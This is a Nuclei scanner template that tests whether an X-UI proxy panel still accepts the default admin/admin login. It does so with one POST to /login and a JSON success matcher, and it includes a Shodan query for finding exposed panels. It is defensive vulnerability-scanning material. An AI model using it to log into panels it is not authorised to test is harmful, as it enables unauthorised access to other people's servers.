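# Nuclei template: checks whether an X-UI panel still accepts the shipped
# default credentials (admin / admin, per the second reference).
#
# The pasted copy had lost all indentation and had blame timestamps
# interleaved with the content, so it could not be parsed as a Nuclei
# template at all; structure is restored below without changing any value.
id: xui-weak-login

info:
  name: X-UI - Default Login
  author: dali
  severity: high
  description: |
    X-UI contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
  reference:
    - https://github.com/vaxilu/x-ui
    - https://seakfind.github.io/2021/10/10/X-UI/#:~:text=By%20default%2C%20the%20login%20user,the%20password%20is%20also%20admin%20.
  classification:
    cwe-id: CWE-798
  metadata:
    verified: true
    # One username/password pair in pitchfork mode => exactly one request.
    max-request: 1
    shodan-query: title:"X-UI Login"
  tags: x-ui,default-login

http:
  - method: POST
    path:
      - "{{BaseURL}}/login"

    headers:
      content-type: application/x-www-form-urlencoded

    # {{username}} / {{password}} are filled from the payload lists below.
    body: "username={{username}}&password={{password}}"

    # pitchfork pairs the lists index-by-index (no cross product), so this
    # stays a single credential check rather than a brute-force attempt.
    attack: pitchfork
    payloads:
      username:
        - "admin"
      password:
        - "admin"

    # All three matchers must hold: a JSON body reporting success, a JSON
    # content-type, and HTTP 200. Requiring all three reduces false positives
    # from unrelated endpoints that happen to echo "success":true.
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"success":true'

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200

# NOTE(review): the digest below is Nuclei's signature over the template
# contents. Any edit to this file (including comments) invalidates it, and
# nuclei will then treat the template as unsigned until it is re-signed.
# digest: 4a0a00473045022100e1f36784ffef57d558271751b0e7a92bab17976ca7606e37cc01a6952f9c0b14022058f645f21814ae9bc4b00d071c3bd6027ff97c1ddb010526500e0799955827ad:922c64590222798bb761d5b6d8e72950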